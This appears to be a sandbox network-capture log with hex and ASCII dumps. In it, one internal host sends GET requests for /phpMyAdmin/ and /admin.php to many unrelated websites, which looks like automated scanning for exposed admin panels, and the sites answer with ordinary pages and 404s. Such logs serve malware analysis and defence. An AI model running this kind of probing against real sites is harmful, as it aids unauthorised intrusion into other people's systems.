2023-12-22 20:15:02 UTC	1252	IN	Data Raw: 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 Data Ascii: ale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' \| translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width">
2023-12-22 20:15:02 UTC	1252	IN	Data Raw: 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 Data Ascii: vices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719
2023-12-22 20:15:02 UTC	271	IN	Data Raw: 72 72 65 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e Data Ascii: rred</h1> <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port
199	192.168.2.4	64944	104.17.71.73	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	399	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=1328995e49fbc51fc6024f7573c2ef9146b1803b-1703276101; __cf_bm=dcgpfec9qqpM41jIjob1ZSgbyJF7hmAh9UuUDPOQm2Y-1703276101-1-AX+K0BviUO3qmKPmlE4Clrq5Uptbru8RwPz6ZJN42KPlSV16HTOV4MUCE7vH63XZ9lAyF0wuO6dhvmvbhMQk/Bs= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	283	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:02 GMT Content-Length: 0 Connection: close Location: https://www.liberty25.org/phpMyAdmin/ Strict-Transport-Security: max-age=31536000 Server: cloudflare CF-RAY: 839b08d7e9517445-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
200	192.168.2.4	64805	209.124.80.122	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	170	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	321	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:02 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:03 UTC	7871	IN	Data Raw: 33 64 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d Data Ascii: 3da4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><!-
2023-12-22 20:15:03 UTC	7915	IN	Data Raw: 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 6f 75 74 6c 69 6e 65 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 61 35 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 66 69 6c 6c 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d Data Ascii: 370;}.ast-header-break-point .ast-mobile-menu-buttons-outline.menu-toggle{background:transparent;border:1px solid #fa5370;color:#fa5370;}.ast-header-break-point .ast-mobile-menu-buttons-fill.menu-toggle{background:#fa5370;color:#ffffff;}.ast-header-break-
2023-12-22 20:15:03 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:03 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 34 32 38 35 37 31 34 32 38 35 37 31 72 65 6d 3b 7d 2e 61 73 74 2d 63 6f 6d 6d 65 6e 74 2d 6d 65 74 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 37 38 35 37 31 34 32 38 35 37 31 34 32 39 72 65 6d 3b 7d 2e 77 69 64 67 65 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 32 38 35 37 31 34 32 38 35 37 31 34 72 65 6d 3b 7d 62 6f 64 79 2c 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 Data Ascii: 1f40omment-reply-title{font-size:23px;font-size:1.6428571428571rem;}.ast-comment-meta{font-size:11px;font-size:0.78571428571429rem;}.widget-title{font-size:20px;font-size:1.4285714285714rem;}body,button,input,select,textarea,.ast-button,.ast-custom-butt
2023-12-22 20:15:03 UTC	7822	IN	Data Raw: 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d Data Ascii: y{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--
2023-12-22 20:15:03 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:03 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 78 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 Data Ascii: 1f40nt-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}</style><link rel='styles
2023-12-22 20:15:03 UTC	7822	IN	Data Raw: 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 22 20 2f 3e 3c 66 65 43 6f 6d 70 6f 6e 65 6e 74 54 72 61 6e 73 66 65 72 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 20 3e 3c 66 65 46 75 6e 63 52 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 2e 35 34 39 30 31 39 36 30 37 38 34 33 31 34 20 30 2e 39 38 38 32 33 35 32 39 34 31 31 37 36 35 22 20 2f 3e 3c 66 65 46 75 6e 63 47 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 20 31 22 20 2f 3e 3c 66 65 46 75 6e 63 42 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 Data Ascii: .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues
2023-12-22 20:15:03 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:15:03 UTC	1382	IN	Data Raw: 35 35 66 0d 0a 2d 63 6f 6c 2d 78 73 2d 31 32 22 20 3e 0d 0a 09 09 09 09 09 09 09 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 32 33 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 20 7c 20 50 6f 77 65 72 65 64 20 62 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 0d 0a 09 09 09 09 09 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 20 3c 21 2d Data Ascii: 55f-col-xs-12" >Copyright 2023 <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span> \| Powered by <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span></div></div> <!-

Session ID	Source IP	Source Port	Destination IP	Destination Port
201	192.168.2.4	64817	34.136.28.237	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	174	OUT	GET /admin.php HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	110	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:02 GMT Connection: close Transfer-Encoding: chunked
2023-12-22 20:15:02 UTC	3451	IN	Data Raw: 64 36 66 0d 0a 3c 21 2d 2d 0a 20 20 53 74 72 69 70 70 65 64 20 64 6f 77 6e 20 76 65 72 73 69 6f 6e 20 6f 66 20 68 74 74 70 73 3a 2f 2f 66 6c 75 74 74 65 72 66 6c 6f 77 2e 69 6f 2f 34 30 34 2e 68 74 6d 6c 0a 0a 20 20 57 65 20 72 65 6d 6f 76 65 64 20 61 20 6c 6f 74 20 6f 66 20 75 6e 6e 65 63 65 73 73 61 72 79 20 73 63 72 69 70 74 73 20 61 6e 64 20 73 65 74 20 3c 62 61 73 65 3e 20 74 6f 20 70 6f 69 6e 74 20 61 74 20 61 20 47 43 53 0a 20 20 6c 6f 63 61 74 69 6f 6e 20 77 69 74 68 20 61 6c 6c 20 64 65 70 65 6e 64 65 6e 63 69 65 73 2e 20 57 65 20 63 61 6e 27 74 20 73 65 72 76 65 20 74 68 65 6d 20 64 69 72 65 63 74 6c 79 20 66 72 6f 6d 20 66 6c 75 74 74 65 72 66 6c 6f 77 2e 69 6f 0a 20 20 62 65 63 61 75 73 65 20 6f 66 20 43 4f 52 53 2e 0a 2d 2d 3e 0a 0a 3c 21 44 Data Ascii: d6f... Stripped down version of https://flutterflow.io/404.html We removed a lot of unnecessary scripts and set <base> to point at a GCS location with all dependencies. We can't serve them directly from flutterflow.io because of CORS.--><!D

Session ID	Source IP	Source Port	Destination IP	Destination Port
202	192.168.2.4	64809	52.165.155.237	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	267	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: intermountainmls.com Accept: / Accept-Encoding: deflate, gzip Cookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	162	IN	HTTP/1.1 200 OK Content-Length: 2174 Connection: close Content-Type: text/html Date: Fri, 22 Dec 2023 20:15:02 GMT Server: Kestrel X-Powered-By: ASP.NET
2023-12-22 20:15:02 UTC	1494	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 42 4d 42 58 58 44 4a 59 31 48 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 20 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b Data Ascii: <!DOCTYPE html><html lang="en"><head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-BMBXXDJY1H"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag() { dataLayer.push(arguments);
2023-12-22 20:15:02 UTC	680	IN	Data Raw: 20 20 6c 5b 27 4c 69 73 74 48 75 62 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 68 3b 20 6c 5b 68 5d 20 3d 20 6c 5b 68 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 6c 5b 68 5d 2e 71 20 3d 20 6c 5b 68 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 6c 5b 68 5d 2e 64 20 3d 20 31 20 2a 20 6e 65 77 20 44 61 74 65 28 29 3b 20 75 20 3d 20 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 20 3d 20 69 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 3b 20 75 2e 61 73 79 6e 63 20 3d 20 31 3b 20 75 2e 73 72 63 Data Ascii: l['ListHubAnalyticsObject'] = h; l[h] = l[h] \|\| function () { (l[h].q = l[h].q \|\| []).push(arguments) }, l[h].d = 1 * new Date(); u = i.createElement(s), b = i.getElementsByTagName(s)[0]; u.async = 1; u.src

Session ID	Source IP	Source Port	Destination IP	Destination Port
203	192.168.2.4	64829	167.235.0.29	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	185	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: www.fotoestudiomiret.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	382	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 35 3a 30 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 3a 20 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:15:02 GMTServer: ApacheX-XSS-Protection: 1; mode=blockAccess-Control-Allow-Origin: Access-Control-Allow-Headers: Access-Control-Allow-Methods: Access-Control-Request-Method: Content-Secur
2023-12-22 20:15:02 UTC	7810	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 0d 0a 20 20 20 20 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 74 6f 65 73 74 75 64 69 6f 6d 69 72 65 74 2e 63 6f 6d 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 Data Ascii: <!DOCTYPE html><html lang="es"> <head> <style>html,body{background-color:;}</style><base href="https://www.fotoestudiomiret.com" /><meta charset="utf-8" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http
2023-12-22 20:15:03 UTC	16384	IN	Data Raw: 69 6f 6e 2d 63 69 72 63 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 22 2c 22 65 78 63 6c 61 6d 61 74 69 6f 6e 22 3a 22 66 61 73 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 22 2c 22 65 78 70 61 6e 64 22 3a 22 66 61 73 20 66 61 2d 65 78 70 61 6e 64 22 2c 22 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 3a 22 66 61 73 20 66 61 2d 65 78 74 65 72 6e 61 6c 2d 6c 69 6e 6b 22 2c 22 65 79 65 22 3a 22 66 61 73 20 66 61 2d 65 79 65 22 2c 22 65 79 65 2d 73 6c 61 73 68 22 3a 22 66 61 73 20 66 61 2d 65 79 65 2d 73 6c 61 73 68 22 2c 22 66 61 63 65 2d 67 72 69 6e 22 3a 22 66 61 73 20 66 61 2d 67 72 69 6e 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 66 61 62 Data Ascii: ion-circle","exclamation-triangle":"fas fa-exclamation-triangle","exclamation":"fas fa-exclamation","expand":"fas fa-expand","external-link":"fas fa-external-link","eye":"fas fa-eye","eye-slash":"fas fa-eye-slash","face-grin":"fas fa-grin","facebook":"fab
2023-12-22 20:15:03 UTC	16384	IN	Data Raw: 6f 73 73 68 61 69 72 73 22 3a 22 66 61 6c 20 66 61 2d 63 72 6f 73 73 68 61 69 72 73 22 2c 22 63 73 73 33 22 3a 22 66 61 62 20 66 61 2d 63 73 73 33 22 2c 22 63 75 62 65 73 22 3a 22 66 61 73 20 66 61 2d 63 75 62 65 73 22 2c 22 64 65 6c 69 63 69 6f 75 73 22 3a 22 66 61 62 20 66 61 2d 64 65 6c 69 63 69 6f 75 73 22 2c 22 64 65 73 6b 74 6f 70 22 3a 22 66 61 73 20 66 61 2d 64 65 73 6b 74 6f 70 22 2c 22 64 65 76 69 61 6e 74 61 72 74 22 3a 22 66 61 62 20 66 61 2d 64 65 76 69 61 6e 74 61 72 74 22 2c 22 64 6f 74 2d 63 69 72 63 6c 65 22 3a 22 66 61 72 20 66 61 2d 64 6f 74 2d 63 69 72 63 6c 65 22 2c 22 64 6f 77 6e 6c 6f 61 64 22 3a 22 66 61 73 20 66 61 2d 64 6f 77 6e 6c 6f 61 64 22 2c 22 64 72 69 62 62 62 6c 65 22 3a 22 66 61 62 20 66 61 2d 64 72 69 62 62 62 6c 65 22 Data Ascii: osshairs":"fal fa-crosshairs","css3":"fab fa-css3","cubes":"fas fa-cubes","delicious":"fab fa-delicious","desktop":"fas fa-desktop","deviantart":"fab fa-deviantart","dot-circle":"far fa-dot-circle","download":"fas fa-download","dribbble":"fab fa-dribbble"
